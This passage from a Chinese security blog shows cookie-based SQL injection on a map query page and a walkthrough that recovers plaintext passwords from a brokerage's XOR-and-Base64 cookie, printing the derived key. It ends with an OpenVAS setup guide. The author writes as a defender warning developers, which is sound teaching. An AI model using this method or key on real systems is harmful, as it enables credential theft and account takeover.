<td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMLvtLJpRVu-HJGHSLR-dPFDgpanGhQ6rW3BZ81Rpn_XUeBKNeIoDB5TstG-8Qm6nYoRyk9DJR9xoCLb1M01ogZPC3N25S-wIJerr3H8XXCIspbnNO9lSRNKJY_Z5vqOnoz921qmYnj1fC/s820/ib01.PNG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="645" data-original-width="820" height="315" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMLvtLJpRVu-HJGHSLR-dPFDgpanGhQ6rW3BZ81Rpn_XUeBKNeIoDB5TstG-8Qm6nYoRyk9DJR9xoCLb1M01ogZPC3N25S-wIJerr3H8XXCIspbnNO9lSRNKJY_Z5vqOnoz921qmYnj1fC/w400-h315/ib01.PNG" width="400" />
</a>
</td>
</tr>
<tr>
<td class="tr-caption" style="text-align: center;">圖1:地圖查詢頁</td>
</tr>
</tbody>
</table></div>
<div style="margin-top:8px">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;">
<tbody>
<tr>
<td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPd5n_BiyGeZytgnt6jPifT_4uvR4JFaNBaPCDuwKfIV60UPd4pKnHyh5rwBB-wNdStxub3tS45_wig0MZpr61mxnL5413lkk-YK7VfHOScomuwFHVy3pq_nYukfbMYGXgyKtCkXRIUxBm/s825/ib02.PNG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="608" data-original-width="825" height="295" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPd5n_BiyGeZytgnt6jPifT_4uvR4JFaNBaPCDuwKfIV60UPd4pKnHyh5rwBB-wNdStxub3tS45_wig0MZpr61mxnL5413lkk-YK7VfHOScomuwFHVy3pq_nYukfbMYGXgyKtCkXRIUxBm/w400-h295/ib02.PNG" width="400" /></a>
</td>
</tr>
<tr>
<td class="tr-caption" style="text-align: center;">圖2:查詢後,在cookei記錄SQL語句</td>
</tr>
</tbody>
</table></div>
<p>為了重複測試,從換頁清單找出瀏覽網址(<b>圖3</b>),每次變更<span style="color: #990000;"><b>QuerySQL</b></span>內容後,就瀏覽前述網址,讓資料庫伺服器執行<span style="color: #990000;"><b>QuerySQL</b></span>所指定的SQL語句。</p>
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;">
<tbody>
<tr>
<td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnNMG_Ky5we4mpzC0EY_ThVloXPwaaaX_cvptEVNtPdar2uivesIrhoC2c4_963Ioh5TeyRVs17g5JWRpZo_7F53YuZyO9BJSl8V36cHAE1C_7LLTYBqTb5vusqv85PybOyJ3xUmeID6c8/s824/ib03.PNG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="455" data-original-width="824" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnNMG_Ky5we4mpzC0EY_ThVloXPwaaaX_cvptEVNtPdar2uivesIrhoC2c4_963Ioh5TeyRVs17g5JWRpZo_7F53YuZyO9BJSl8V36cHAE1C_7LLTYBqTb5vusqv85PybOyJ3xUmeID6c8/w400-h221/ib03.PNG" width="400" /></a>
</td>
</tr>
<tr>
<td class="tr-caption" style="text-align: center;">圖3:找出直接瀏覽的網址</td>
</tr>
</tbody>
</table></div>
<p>為測試修改後的<span style="color: #990000;"><b>QuerySQL</b></span>是否會交由後端執行,將SQL的條件移除(<b>Where</b>及之後的文字,如<b>圖4</b>),再重新瀏覽,此時系統真的回傳<span style="color: #990000;"><b>1839</b>
</span>頁(如<b>圖5</b>,<span style="color: #cc0000;">原本只有1頁</span>),至此確認Cookie的<span style="color: #990000;"><b>QuerySQL</b></span>存在SQL injection漏洞。</p>
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR0UdQzd89kA2hqbXUl4-r9XqUj2fFheqqAqHOPyGSl5kpM2ekvnfSyZpEC4-2PmtWSK6wWF-UmMmb5X9uDhCASIodh1YLx40KuRxABaoeRR7OZZLObTjM7VZEfDAS8EW6kViEfeFrR0O-/s1283/ib04.PNG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="585" data-original-width="1283" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR0UdQzd89kA2hqbXUl4-r9XqUj2fFheqqAqHOPyGSl5kpM2ekvnfSyZpEC4-2PmtWSK6wWF-UmMmb5X9uDhCASIodh1YLx40KuRxABaoeRR7OZZLObTjM7VZEfDAS8EW6kViEfeFrR0O-/w400-h183/ib04.PNG" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">圖4:修改Cookie裡的QuerySQL的語句</td></tr></tbody></table></div>
<div style="margin-top:8px">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGyI9N7GtvXwI6GbAOSsHrZD0MII15hmoUxOs5_es5Qh4CAN-nFGgYuQWrioT-CJaUVUcF55xQFB5VGH5VLIhHCfGCLlm-uT7ahZ0w-eoKgKDm79eNy88CY9Tn4I-7bkFROJuHKlQ3g4dB/s734/ib05.PNG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="585" data-original-width="1283" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGyI9N7GtvXwI6GbAOSsHrZD0MII15hmoUxOs5_es5Qh4CAN-nFGgYuQWrioT-CJaUVUcF55xQFB5VGH5VLIhHCfGCLlm-uT7ahZ0w-eoKgKDm79eNy88CY9Tn4I-7bkFROJuHKlQ3g4dB/s734/ib05.PNG" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">圖5:從回傳的結果證實QuerySQL存在SQL Injection漏洞</td></tr></tbody></table></div>
<hr />
<fieldset style="background-color: #ffddff;">
<legend style="background-color: #ffddff; font-size: 1.1em; font-weight: bold;">再苦口婆心一次</legend>
若需要在session之間交換資料,請使用後端的session變數記錄欲交換的內容,千萬不要使用Cookie或頁面上的隱藏欄位,面對駭客,Cookie及隱藏欄位絲毫不具防護能力!
</fieldset>
</div>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-82282689410436742362021-02-21T08:43:00.000+08:002021-02-21T08:43:03.097+08:00分享「破解密碼」的經驗<div style="border: 4px solid rgb(0, 0, 204); font-size: 1.2em; line-height: 200%; padding: 8px; word-break: normal;">
<fieldset style="background-color: #ffddff;">
<legend style="background-color: #ffddff; font-size: 1.1em; font-weight: bold;">提醒程式開發人員</legend>
許多文章及書籍都告戒「<span style="color: #274e13;">密碼應經雜湊(hash)或『經驗證』的強加密演算法處理後再保存</span>」
</fieldset>
<p style="text-indent: 2em;"><b>某券商</b>的網路下單系統,在登入後或變更密碼時,會將此密碼編碼並紀錄在<b>Cookie</b>裡,本文將說明如何破解從此<b>Cookie</b>內容而得到明文密碼。<b><span style="color: #990000;">基於職業道德,不便提供此下單系統的網址及細部資訊</span></b>。</p>
<p style="text-indent: 2em;"><b>每次</b>變更密碼後,檢視回應(response)的標頭(header)發現LoginPWD欄位值的長度是4的倍數(<b>圖1</b>),且字元符合BASE64編碼形式,猜測密碼是利用BASE64編碼後再記錄到Cookie,但是解碼LoginPWD的值卻得到亂碼(<b>圖2</b>),而非原來的密碼明文,推測「執行BASE64編碼前,密碼應該還進行其他編碼處理」。既然使用BASE64 to Text得到亂碼,只好改用BASE64 to Hex來觀查解碼後的內容(<b>圖3</b>)。</p>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0oF-pradjOdrHJ555L0FCGbh9wPsKeDlRqnq0476gzcac2t6-U9D19ihwj3PEzrV8Oiw3NvphDWhMf-yW8VQqk1ijbc6csqZRqMfzPnUKzcouC8VT96cfgw4C5aRo0xJb6T-SH0KSzkf7/s1509/stock_01.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="778" data-original-width="1509" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0oF-pradjOdrHJ555L0FCGbh9wPsKeDlRqnq0476gzcac2t6-U9D19ihwj3PEzrV8Oiw3NvphDWhMf-yW8VQqk1ijbc6csqZRqMfzPnUKzcouC8VT96cfgw4C5aRo0xJb6T-SH0KSzkf7/w400-h206/stock_01.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">圖1:檢視回應內容的標頭資訊<br /></td></tr></tbody></table><br /> <table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC4yvB2zVLujvJSf1areVsoVQ4oQmsqaVBKPWcf23aKMxfWXzSlIOIw8sXym-5FDcKtqaZs2wzFI4V8sA0CdmSy4b6Th0MaVtSHOAidl6NXCyzLjFgLk4a6WPX-o09OITTbzgHqW4kMPp4/s597/stock_02.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="597" data-original-width="487" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC4yvB2zVLujvJSf1areVsoVQ4oQmsqaVBKPWcf23aKMxfWXzSlIOIw8sXym-5FDcKtqaZs2wzFI4V8sA0CdmSy4b6Th0MaVtSHOAidl6NXCyzLjFgLk4a6WPX-o09OITTbzgHqW4kMPp4/w326-h400/stock_02.png" width="326" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">圖2:直接解碼只得到亂碼<br /></td></tr></tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW94IooJ__h0jgQ-iOgP1v2f_HT6OTu2WUqamwTngCmwrieLvPFPiRNLqFHKpuzRlrFyz88pWpeeUrkDalGFVWgE3-VSc-cmq8EC1SITG2J9hgs6L_MbbEoDLv6BSrDtuLHutNoYeMRxGU/s834/stock_03.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="834" data-original-width="536" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW94IooJ__h0jgQ-iOgP1v2f_HT6OTu2WUqamwTngCmwrieLvPFPiRNLqFHKpuzRlrFyz88pWpeeUrkDalGFVWgE3-VSc-cmq8EC1SITG2J9hgs6L_MbbEoDLv6BSrDtuLHutNoYeMRxGU/w258-h400/stock_03.png" width="258" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">圖3:使用BASE64 to Hex查看解碼後的結果<br /></td></tr></tbody></table>
<p style="text-indent: 2em;"></p>
<p>要破解密碼,當然不會只使用一組資訊,<b>下表</b>是筆者以不同的密碼得出下單系統回傳的<b>LoginPWD</b>值,並和該密碼的BASE64編碼進行比較。</p>
<table border="1" bordercolordark="#808080" bordercolorlight="#808080" cellpadding="2" cellspacing="1" style="border-collapse: collapse; font-size: 10pt;">
<thead>
<tr>
<td>NO</td>
<td>密碼</td>
<td>直接BASE64編碼</td>
<td>密碼的Hex</td>
<td>LoginPWD</td>
<td>解碼成Hex</td>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>AaBbCcDdE012</td>
<td>QWFCY<span style="background-color: #fcff01;"><span style="color: #674ea7;"><b>kN</b></span></span>jRGRFMDEy</td>
<td>416142624363446445303132</td>
<td>AZiE4<span style="background-color: #fcff01;"><b><span style="color: #674ea7;">EE</span></b></span>KG79Npb05<b><span style="color: #2b00fe;">nw==</span></b></td>
<td>019884E0410A1BBF4DA5BD399F</td>
</tr>
<tr>
<td>2</td>
<td>AaBbCcdDe012</td>
<td>QWFCY<span style="background-color: #fcff01;"><span style="color: #674ea7;"><b>kN</b></span></span>jZERlMDEy</td>
<td>416142624363644465303132</td>
<td>AZiE4<span style="background-color: #fcff01;"><span style="color: #674ea7;"><b>EE</b></span></span>KO59tpb05<span style="color: #2b00fe;"><b>nw==</b></span></td>
<td>019884E0410A3B9F6DA5BD399F</td>
</tr>
<tr>
<td>3</td>
<td><span style="color: red;">ABC123</span>456789</td>
<td>QUJDMTIzNDU2Nzg5</td>
<td>414243313233343536373839</td>
<td><span style="color: red;">AbuFszBa</span>a+4+orQy<span style="color: #2b00fe;"><b>nw==</b></span></td>
<td>01BB85B3305A6BEE3EA2B4329F</td>
</tr>
<tr>
<td>4</td>
<td>abc123456789</td>
<td>YWJjMTIzNDU2Nzg5</td>
<td>616263313233343536373839</td>
<td>IZulszBaa+4+orQy<span style="color: #2b00fe;"><b>nw==</b></span></td>
<td>219BA5B3305A6BEE3EA2B4329F</td>
</tr>
<tr>
<td>5</td>
<td><span style="color: red;">ABC123</span></td>
<td>QUJDMTIz</td>
<td>414243313233</td>
<td><span style="color: red;">AbuFszBa</span><span style="color: #2b00fe;"><b>Xw==</b></span></td>
<td>01BB85B3305A5F</td>
</tr>
<tr>
<td>6</td>
<td>abc123</td>
<td>YWJjMTIz</td>
<td>616263313233</td>
<td>IZulszBa<span style="color: #2b00fe;"><b>Xw==</b></span></td>
<td>219BA5B3305A5F</td>
</tr>
</tbody>
</table>
<p><b>從上表可以找出幾個現象</b></p>
<ol>
<li>當密碼長度不一樣時,<b>LoginPWD</b>的長度也不一樣,但仍<span style="color: #cc0000;">維持4的倍數</span>。</li><li><b>LoginPWD</b>的長度都比直接BASE64編碼<span style="color: #cc0000;">多出4個字元</span>,如上表LowinPWD欄的<span style="color: #2b00fe;"><b>粗藍</b></span>字。</li><li>由於筆者測試的密碼都是3的倍數,而LoginPWD出多的4字元之<b>後兩碼</b>皆為<b>==</b>,依照BASE64的規則,代表有2個<b>填充</b>字元,推測下單系統會先在<b>原密碼之後附加1字元</b>再執行編碼。<br /></li><li>比對各組密碼,相同位置相同字元,對應的<b>LoginPWD</b>內容也相同,如項次3及5<span style="color: red;">紅字</span>部分。 <br /></li>
</ol>
<p><b>開始思考開發者可能使用的編碼方式</b></p>
<ol>
<li>是不是使用對照表轉換BASE64的編碼字元?<br />但從上表項次1或2的<span style="background-color: #fcff01;">黃底</span>字看到<b>k</b>及<b>N</b>都對應到<b>E</b>,顯然不合理。</li><li>是不是使用特定KEY進行轉碼?<br />試著將「密碼的Hex」與「解碼成Hex」的值進行<b>XOR</b>運算(「解碼成Hex」的最後一碼是附加的,故先捨棄),結果如下表的「XOR結果」欄 <br /></li>
</ol>
<table border="1" bordercolordark="#808080" bordercolorlight="#808080" cellpadding="2" cellspacing="1" style="border-collapse: collapse; font-size: 10pt;">
<thead>
<tr>
<td>NO</td>
<td>密碼</td>
<td>密碼的Hex</td>
<td>解碼成Hex</td>
<td>XOR結果</td>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>AaBbCcDdE012</td>
<td>416142624363446445303132</td>
<td>019884E0410A1BBF4DA5BD399F</td>
<td><span style="color: red;">40F9C6820269</span><span style="background-color: #ea9999;">5F</span>DB08958C0B</td>
</tr>
<tr>
<td>2</td>
<td>AaBbCcdDe012</td>
<td>416142624363644465303132</td>
<td>019884E0410A3B9F6DA5BD399F</td>
<td><span style="color: red;">40F9C6820269</span><span style="background-color: #ea9999;">5F</span>DB08958C0B</td>
</tr>
<tr>
<td>3</td>
<td>ABC123456789</td>
<td>414243313233343536373839</td>
<td>01BB85B3305A6BEE3EA2B4329F</td>
<td><span style="color: red;">40F9C6820269</span><span style="background-color: #ea9999;">5F</span>DB08958C0B</td>
</tr>
<tr>
<td>4</td>
<td>abc123456789</td>
<td>616263313233343536373839</td>
<td>219BA5B3305A6BEE3EA2B4329F</td>
<td><span style="color: red;">40F9C6820269</span><span style="background-color: #ea9999;">5F</span>DB08958C0B<br /></td>
</tr>
<tr>
<td>5</td>
<td>ABC123</td>
<td>414243313233</td>
<td>01BB85B3305A<span style="background-color: #ea9999;">5F</span></td>
<td><span style="color: red;">40F9C6820269</span><br /></td>
</tr>
<tr>
<td>6</td>
<td>abc123</td>
<td>616263313233</td>
<td>219BA5B3305A<span style="background-color: #ea9999;">5F</span></td>
<td><span style="color: red;">40F9C6820269</span><br /></td>
</tr>
</tbody>
</table>
<p><b>從上表的「XOR結果」得到如下結論</b></p>
<ol>
<li>從項次1到6的<b>XOR</b>結果,可知下單系統會<b>逐字元</b>進行<b>XOR</b>處理。</li>
<li>由項次5多出來的「<span style="background-color: #ea9999;">5F</span>」,與項次4同一位置的KEY相同,得知下單系統附加的字元是ASCII的<b>NUL</b>字元(十六進制碼 <span style="background-color: #ea9999;"><b>00</b></span>)。</li>
</ol>
<p>目前<b>解得35碼的XOR Key值</b>是「40F9C68202695FDB08958C0B9F74F518BC6361D42F22998F31B2895B67BF64AA505D528E」,亦即「0x40,0xF9,0xC6,0x82,0x02,0x69,0x5F,0xDB,0x08,0x95,0x8C,0x0B,0x9F,0x74,0xF5,0x18,0xBC,0x63,0x61,0xD4,0x2F,0x22,0x99,0x8F,0x31,0xB2,0x89,0x5B,0x67,0xBF,0x64,0xAA,0x50,0x5D,0x52,0x8E」</p>
<p>知道XOR的Key值後,就能對任意LoginPWD進行解碼,步驟如下:</p>
<ol>
<li>先將<b>LoginPWD</b>進行<a href="https://base64.guru/converter/decode/hex"><b>BASE64 to Hex</b></a>解碼,得到十六進制結果,以<span style="color: #990000;"><b>HEX</b></span>表示。</li>
<li>將<span style="color: #990000;"><b>HEX</b></span>的最右邊的Byte捨棄,因它是附加的字元NUL,無關緊要。以<span style="color: #990000;"><b>HEX2</b></span>表示。<br /></li><li>從XOR Key的左邊取出和<span style="color: #990000;"><b>HEX2</b></span>等長的資料,以<span style="color: #990000;"><b>KEY2</b></span>表示。</li>
<li>將<span style="color: #990000;"><b>HEX2</b></span>與<span style="color: #990000;"><b>KEY2</b></span>進行<a href="http://xor.pw/"><b>XOR</b></a>,</li><li>將得到的十六進制值<a href="https://www.rapidtables.com/convert/number/hex-to-ascii.html"><b>轉成ASCII</b></a>即得到密碼明文。</li>
</ol>
<p>就以「<b>LoginPWD: E62TszBaa+4+orQynw==</b>」為例:</p>
<ol>
<li>先將「<b><span style="color: #0c343d;">E62TszBaa+4+orQynw==</span></b>」進行<a href="https://base64.guru/converter/decode/hex">BASE64 to Hex</a>解碼,得到「<span style="color: #2b00fe;"><b>13AD93B3305A6BEE3EA2B4329F</b></span>」。</li>
<li>將「<span style="color: #2b00fe;"><b>13AD93B3305A6BEE3EA2B4329F</b></span>」最右邊的Byte(即9F)捨棄,剩12Byte。<br /></li>
<li>從XOR Key的左邊取出12Byte,即「<span style="color: #b45f06;"><b>40F9C68202695FDB08958C0B</b></span>」。<br /></li><li>將「<span style="color: #2b00fe;"><b>13AD93B3305A6BEE3EA2B432</b></span>」與「<span style="color: #b45f06;"><b>40F9C68202695FDB08958C0B</b></span>」進行XOR即得「<b><span style="color: #990000;">535455313233343536373839</span></b>」。</li><li>將「<b><span style="color: #990000;">535455313233343536373839</span></b>」<a href="https://www.rapidtables.com/convert/number/hex-to-ascii.html">轉成ASCII</a>,得到密碼明文「<span style="background-color: #f4cccc; font-size: large;"><b>STU123456789</b></span>」。 <br /></li>
</ol>
<hr />
<fieldset style="background-color: #bbffbb;">
<legend style="background-color: #bbffbb; font-weight: bold;">使用的線上工具如下</legend>
<p><b>BASE64 編碼/解碼</b>:<a href="https://base64.guru/converter/decode/hex">https://base64.guru/converter/decode/hex</a></p><p><b>XOR 計算器</b>:<a href="http://xor.pw/">http://xor.pw/</a></p><p><b>ASCII/HEX轉換</b>:<a href="https://www.rapidtables.com/convert/number/hex-to-ascii.html">https://www.rapidtables.com/convert/number/hex-to-ascii.html</a><br /></p>
</fieldset>
</div>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-71948539485521417102020-11-15T16:58:00.005+08:002023-03-11T09:16:27.017+08:00在Kali 2020.3 精簡環境安裝OpenVAS<div style="border: 4px solid rgb(0, 0, 204); font-size: 12pt; line-height: 200%; padding: 8px;">
<p style="text-indent: 2em;">對於滲透測試人員,<span style="color: #990000;"><b>Nessus</b></span>及<span style="color: #990000;"><b>OpenVAS</b></span>是兩套很實用(又免費)的弱掃工具,為了避免影響執行效能,筆者習慣將它們獨立安裝,這兩套工具都是使用瀏覽器作為使用者界面,獨立安裝的環境就不需要保留X-WINDOW視窗,可以讓資源充分供弱掃工具使用。</p>
<p style="text-indent: 2em;">筆者著作「<a href="https://www.tenlong.com.tw/products/9789865023584?list_name=b-r30-zh_tw" target="_blank"><b>Kali Linux 滲透測試工具</b></a>」雖然也有介紹OpenVAS的安裝方式,但隨著工具改版,現在OpenVAS的安裝又不一樣了,在此做個補充。</p>
<p><span style="color: #274e13; font-size: large;"><b>一、安裝Kali精簡環境</b></span></p>
<div style="background-color: black; color: #fbcf08; margin-top: -16px;">
<ol><li>到<a href="https://www.kali.org/" style="color: white;" target="_blank"> kali.org</a> 下載「Kali Linux 64-Bit (NetInstaller)」。</li><li>建立一部虛擬機,安裝方式請選擇「<span style="color: white;">Install disk image file(iso)</span>」,並以前一步驟下載的「kali-linux-2020.3-installer-netinst-amd64.iso」作為iso來源。</li><li>作業系統類型請選擇「<span style="color: white;">Linux/Debian-9.x 64 bit</span>」;並將磁碟空間設為100GB。</li><li>啟動此虛擬機,進入作業系統安裝程序,按照畫面指示安裝,為避名預設主機名稱發生衝突,請指定合
適的Hostname,筆者是使用OPENVAS2020。</li><li>Kali預設<span style="color: #ea9999;"><b>不再提供root權限</b></span>,安裝過程必須指定使用者帳號,筆者選用openvas作為使用者,密碼就設為toor</li><li>在選擇欲安裝的軟體時,請<span style="color: #ea9999;">取消Desktop environment及top10</span>(如下圖),只需要留下精簡環境所需的工具即可。
<div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiROMJy6QWn4DbAp4XWlbEEngTEWcbcRmGp0reuNCHCdHZixHBxAq71fSJmRvJFqkUUmOx2KL5Hn0Wet5f9ILlC7JPLrKVP3RE5mJRVloQkY0tyxozYrmd92J7-hIw-7kRxA6OnIyDebrlo/s767/openvas-01.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="363" data-original-width="767" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiROMJy6QWn4DbAp4XWlbEEngTEWcbcRmGp0reuNCHCdHZixHBxAq71fSJmRvJFqkUUmOx2KL5Hn0Wet5f9ILlC7JPLrKVP3RE5mJRVloQkY0tyxozYrmd92J7-hIw-7kRxA6OnIyDebrlo/s400/openvas-01.PNG" width="400" /></a></div></div>
</li>
<li>過程中可能出現軟體安裝失敗(如下圖),按照畫面說明,直接按「<span style="color: white;">Enter</span>」,在下一個畫面,手動選擇「<span style="color: white;">Install the GRUB boot
loader</span>」,略過軟體安裝步驟!
<div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNZesTAHLTcsBc9fzKA5rRlYGbjKM1vKLPUylQtSehSNAYMg3Jvt4SkeUJck-kQHMJTGiQaEcvYiqMOf6-woKJqq9FBvyCBMJ8qUKDw1CqDz7qo-1L63VvHaAYae30zUtv2XDfzoqAu9Mx/s778/openvas-02.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="219" data-original-width="778" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNZesTAHLTcsBc9fzKA5rRlYGbjKM1vKLPUylQtSehSNAYMg3Jvt4SkeUJck-kQHMJTGiQaEcvYiqMOf6-woKJqq9FBvyCBMJ8qUKDw1CqDz7qo-1L63VvHaAYae30zUtv2XDfzoqAu9Mx/s400/openvas-02.PNG" width="400" /></a></div></div>
</li>
<li>安裝完成後會自動重開機!然後進入命令列介面。請以步驟5. 所設的帳號及密碼登入,記住,此帳號不具root權限,很多指令都必須用<span style="color: #ea9999;"><b>sudo</b></span>引導!</li></ol>
</div>
<p><span style="color: #274e13; font-size: large;"><b>二、請依下列更新Kali及安裝必要工具</b></span></p>
<div style="background-color: black; color: #fbcf08; margin-top: -16px;">
<ol>
<li>sudo apt update && apt upgrade -y <span style="color: #04ff00;">#更新作業系統環境(每隔幾天就做一次吧)</span></li>
<li>sudo apt install locate curl wget
<span style="color: #04ff00;">#安裝必要工具</span></li>
<li>sudo apt install gvm*
<span style="color: #04ff00;"> #安裝OpenVAS</span></li><li>sudo service --status-all
<span style="color: #04ff00;"> #檢查 postgresql、redis-server 及 gvmd 是否有啟動,如果沒有啟動,請手工啟動</span><br />
<div style="border: 2px solid white; padding: 4px;"><span style="color: #04ff00;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiVfLHTxJqvFXZpqNZWqwUisLJkjXJkfAiEoWrVUv3L4EEYnSAiix3Veahs5XW5oJ5aVXUf40Ig4okYNJfJR6UqjYNJZpNZQLiytApcQz7oV_YFFvRuYAlUj7z1mZ1GFTn1BgvENpBmIbl/s412/openvas-03.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="412" data-original-width="405" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiVfLHTxJqvFXZpqNZWqwUisLJkjXJkfAiEoWrVUv3L4EEYnSAiix3Veahs5XW5oJ5aVXUf40Ig4okYNJfJR6UqjYNJZpNZQLiytApcQz7oV_YFFvRuYAlUj7z1mZ1GFTn1BgvENpBmIbl/s320/openvas-03.PNG" /></a></div></span></div></li>
<li>sudo service redis-server start <span style="color: #04ff00;">
#手動啟動 redis-server,若出現錯誤訊息,請參考本篇底下的「備註」<br /></span></li><li>sudo update-rc.d redis-server enable <span style="color: #04ff00;">#若能啟動 redis-server,就將它設為開機時自動啟動</span></li>
<li>sudo service postgresql start <span style="color: #04ff00;">#啟動 postgresql</span><br /></li>
<li>sudo update-rc.d postgresql enable <span style="color: #04ff00;">#將 postgresql 設定自動啟動</span><br /></li>
<li>sudo reboot <span style="color: #04ff00;"> #重新啟動作業系統</span><br /><span style="color: #04ff00;"><span style="color: red;">不要使用 su - 切換到root身分</span>,不然執行「<span style="color: white;">gvm-setup</span>」會出現<br />
「<span style="color: #ea9999;">could not change directory to /root permission denied</span>」的錯誤訊息 <br /><br /></span></li>
<li>sudo gvm-setup
<span style="color: #04ff00;">#執行OpenVAS設定(會花很長時間)</span></li>
<li>sudo gvm-check-setup <span style="color: #04ff00;">
#執行OpenVAS檢查,看看缺少什麼東西</span><br /><span style="color: #04ff00;">注意錯誤訊息(<span style="color: red;">FIX:</span> 開頭),並按照提示修正,直到「<span style="color: white;">sudo gvm-check-setup</span>」的結果沒有需要「FIX:」的項目。</span>
<div style="border: 2px solid white; padding: 4px;"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2GPnM2MuHuRBRABCdy8_gKCV1Ap_I2y7PjFqdydm1QrnuqxN8EWflREslrEg-0JqHyoBLzgNAMSz1fVJJC20TwwKLQ6_t82kWaoksKAweLYDwAcFwXIg5q0mCd5OO_rYbAyAqYCUWggVA/s884/openvas-05.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="643" data-original-width="884" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2GPnM2MuHuRBRABCdy8_gKCV1Ap_I2y7PjFqdydm1QrnuqxN8EWflREslrEg-0JqHyoBLzgNAMSz1fVJJC20TwwKLQ6_t82kWaoksKAweLYDwAcFwXIg5q0mCd5OO_rYbAyAqYCUWggVA/w400-h291/openvas-05.PNG" width="400" /></a></div></div>
</li>
<li>sudo service --status-all
<span style="color: #04ff00;"> #再次檢查 postgresql、redis-server 及 gvmd 是否有啟動</span></li>
<li>sudo service gvmd start <span style="color: #04ff00;">
#手動啟動 gvmd</span></li>
<li>sudo update-rc.d gvmd enable <span style="color: #04ff00;">#將 postgresql 設定自動啟動</span></li>
<li>sudo gvm-start <span style="color: #04ff00;">
#正式啟動 OpenVAS伺服器,如果有錯誤訊息,請修正</span></li></ol>
</div>
<p><span style="color: #274e13; font-size: large;"><b>三、從外部電腦操作OpenVAS伺服器</b></span></p>
<p style="text-indent: 2em;">
由於OpenVAS預設只能從本機連線,但我們是安裝在精簡型Kali,本身沒有瀏覽器,必須想辦法讓外部的電腦可以連線這部OpenVAS伺服器</p>
<div style="background-color: black; color: #fbcf08;">
<ol><li>sudo sudo nano /lib/systemd/system/greenbone-security-assistant.service <br />修改gsad的接聽範圍,請將「<span style="color: white;">ExecStart=/usr/sbin/gsad --listen=<span style="color: #01ffff;"><b>127.0.0.1 </b></span>
--port=9392</span>」<br />改成「<span style="color: white;">ExecStart=/usr/sbin/gsad --listen=<span style="color: #01ffff;"><b>0.0.0.0</b></span>
--port=9392</span>」,表示接聽所有網卡的請求
